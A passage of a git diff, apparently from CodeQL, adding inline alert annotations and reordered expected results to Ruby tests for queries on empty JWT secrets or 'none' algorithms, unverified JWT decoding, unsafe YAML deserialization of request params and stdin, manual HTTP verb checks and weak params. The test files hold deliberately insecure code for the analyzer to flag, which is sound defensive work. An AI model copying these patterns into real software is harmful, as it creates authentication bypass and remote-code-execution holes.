a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb index a78ec0d0421b..8744163786c6 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb @@ -6,10 +6,10 @@ token1 = JWT.encode({ foo: 'bar' }, "secret", 'none') # BAD: the secret used is empty -token2 = JWT.encode({ foo: 'bar' }, nil, 'HS256') +token2 = JWT.encode({ foo: 'bar' }, nil, 'HS256') # $ Alert[rb/jwt-empty-secret-or-algorithm] # BAD: the secret used is empty -token3 = JWT.encode({ foo: 'bar' }, "", 'HS256') +token3 = JWT.encode({ foo: 'bar' }, "", 'HS256') # $ Alert[rb/jwt-empty-secret-or-algorithm] # GOOD: the token is signed token4 = JWT.encode({ foo: 'bar' }, "secret", 'HS256') \ No newline at end of file diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref index 793275aef112..dba60e5fbb48 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref @@ -1 +1,2 @@ -experimental/cwe-347/MissingJWTVerification.ql \ No newline at end of file +query: experimental/cwe-347/MissingJWTVerification.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb index 4c5bd08094ed..388eabbe7d58 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb @@ -3,19 +3,19 @@ payload = { foo: 'bar' } # Unsecure token -token_without_signature = JWT.encode(payload, nil, 'none') +token_without_signature = JWT.encode(payload, nil, 'none') # $ Alert[rb/jwt-empty-secret-or-algorithm] # Secure token token = JWT.encode(payload, "secret", 'HS256') # BAD: it does not verify -decoded_token1 = JWT.decode(token_without_signature, nil, false, algorithm: 'HS256') +decoded_token1 = JWT.decode(token_without_signature, nil, false, algorithm: 'HS256') # $ Alert[rb/jwt-missing-verification] # BAD: it's using none -decoded_token3 = JWT.decode(token_without_signature, secret, true, algorithm: 'none') +decoded_token3 = JWT.decode(token_without_signature, secret, true, algorithm: 'none') # $ Alert[rb/jwt-missing-verification] # BAD: it's using none -decoded_token4 = JWT.decode(token_without_signature, secret, true, { algorithm: 'none' }) +decoded_token4 = JWT.decode(token_without_signature, secret, true, { algorithm: 'none' }) # $ Alert[rb/jwt-missing-verification] # GOOD: it does verify decoded_token5 = JWT.decode(token, secret, 'HS256') diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected index 0fa5f9158300..0cfb19a43619 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected @@ -1,3 +1,18 @@ +#select +| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | edges | UnsafeYamlDeserialization.rb:10:5:10:13 | yaml_data | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | provenance | | | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:10:17:10:28 | ...[...] | provenance | | @@ -39,18 +54,3 @@ nodes | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | semmle.label | call to gets | | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | semmle.label | call to readlines | subpaths -#select -| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref index 991ba757e43a..f7fb7dfe3fc4 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref @@ -1 +1,2 @@ -experimental/cwe-502/UnsafeYamlDeserialization.ql \ No newline at end of file +query: experimental/cwe-502/UnsafeYamlDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb index c9b186e0915b..dc3e1cbab95b 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb @@ -7,15 +7,15 @@ class UsersController < ActionController::Base # BAD before psych version 4.0.0 and def route1 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end # GOOD In psych version 4.0.0 and above def route2 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end @@ -29,14 +29,14 @@ def route3 # BAD def route4 - yaml_data = params[:key] - object = Psych.unsafe_load(yaml_data) - object = Psych.unsafe_load_file(yaml_data) - object = Psych.load_stream(yaml_data) + yaml_data = params[:key] # $ Source + object = Psych.unsafe_load(yaml_data) # $ Alert + object = Psych.unsafe_load_file(yaml_data) # $ Alert + object = Psych.load_stream(yaml_data) # $ Alert parse_output = Psych.parse_stream(yaml_data) - object = parse_output.to_ruby - object = Psych.parse(yaml_data).to_ruby - object = Psych.parse_file(yaml_data).to_ruby + object = parse_output.to_ruby # $ Alert + object = Psych.parse(yaml_data).to_ruby # $ Alert + object = Psych.parse_file(yaml_data).to_ruby # $ Alert parsed_yaml = Psych.parse_stream(yaml_data) parsed_yaml.children.each do |child| object = child.to_ruby @@ -46,7 +46,7 @@ def route4 end object = parsed_yaml.children.first.to_ruby content = parsed_yaml.children[0].children[0].children - object = parsed_yaml.to_ruby[0] + object = parsed_yaml.to_ruby[0] # $ Alert object = content.to_ruby[0] object = Psych.parse(yaml_data).children[0].to_ruby end @@ -58,18 +58,18 @@ def route5 end def stdin - object = YAML.load $stdin.read + object = YAML.load $stdin.read # $ Alert # STDIN - object = YAML.load STDIN.gets + object = YAML.load STDIN.gets # $ Alert # ARGF - object = YAML.load ARGF.read + object = YAML.load ARGF.read # $ Alert # Kernel.gets - object = YAML.load gets + object = YAML.load gets # $ Alert # Kernel.readlines - object = YAML.load readlines + object = YAML.load readlines # $ Alert end end diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected index e0e85b75ebbe..b4dc532a38b3 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected @@ -1,3 +1,11 @@ +#select +| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | edges | ManuallyCheckHttpVerb.rb:11:5:11:10 | method | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | provenance | | | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:11:14:11:42 | ...[...] | provenance | | @@ -32,11 +40,3 @@ nodes | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | semmle.label | call to env | | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | semmle.label | ...[...] | subpaths -#select -| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref index 463c21cd0f29..455d02aef04c 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.qlref @@ -1 +1,2 @@ -experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql \ No newline at end of file +query: experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb index 055e9d986382..0dc9df656038 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.rb @@ -1,39 +1,39 @@ class ExampleController < ActionController::Base # Should find def example_action - if request.get? + if request.get? # $ Alert Resource.find(id: params[:example_id]) end end # Should find def other_action - method = request.env['REQUEST_METHOD'] - if method == "GET" + method = request.env['REQUEST_METHOD'] # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def foo - method = request.request_method - if method == "GET" + method = request.request_method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def bar - method = request.method - if method == "GET" + method = request.method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end # Should find def baz - method = request.raw_request_method - if method == "GET" + method = request.raw_request_method # $ Source + if method == "GET" # $ Alert Resource.find(id: params[:id]) end end @@ -48,15 +48,15 @@ def baz2 # Should find def foobarbaz - method = request.request_method_symbol - if method == :GET + method = request.request_method_symbol # $ Source + if method == :GET # $ Alert Resource.find(id: params[:id]) end end # Should find def resource_action - case request.env['REQUEST_METHOD'] + case request.env['REQUEST_METHOD'] # $ Alert when "GET" Resource.find(id: params[:id]) when "POST" diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected index 4f72a24cee77..6dd6637abd4d 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected @@ -1,3 +1,8 @@ +#select +| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | edges | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | provenance | | | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | provenance | | @@ -13,8 +18,3 @@ nodes | WeakParams.rb:20:28:20:38 | call to GET | semmle.label | call to GET | | WeakParams.rb:20:28:20:44 | ...[...] | semmle.label | ...[...] | subpaths -#select -| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref index 5350e4bf40a5..96a41103dd44 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.qlref @@ -1 +1,2 @@ -experimental/weak-params/WeakParams.ql \ No newline at end of file +query: experimental/weak-params/WeakParams.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb index a5edef2e6dc2..89a495a40963 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.rb @@ -2,22 +2,22 @@ class TestController < ActionController::Base # Should catch def create - TestObject.create(foo: request.request_parameters[:foo]) + TestObject.create(foo: request.request_parameters[:foo]) # $ Alert end # Should catch def create_query - TestObject.create(foo: request.query_parameters[:foo]) + TestObject.create(foo: request.query_parameters[:foo]) # $ Alert end # Should catch def update_unsafe - TestObject.update(foo: request.POST[:foo]) + TestObject.update(foo: request.POST[:foo]) # $ Alert end # Should catch def update_unsafe_get - TestObject.update(foo: request.GET[:foo]) + TestObject.update(foo: request.GET[:foo]) # $ Alert end # Should not catch diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref index 315464375988..53ed649c7e4c 100644 --- a/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref +++ b/ruby/ql/test/query-tests/metrics/FLines/FLines.qlref @@ -1 +1 @@ -queries/metrics/FLines.ql \ No newline at end of file +query: queries/metrics/FLines.ql diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref index cb4dd2b8767c..c77e9739c0ac 100644 --- 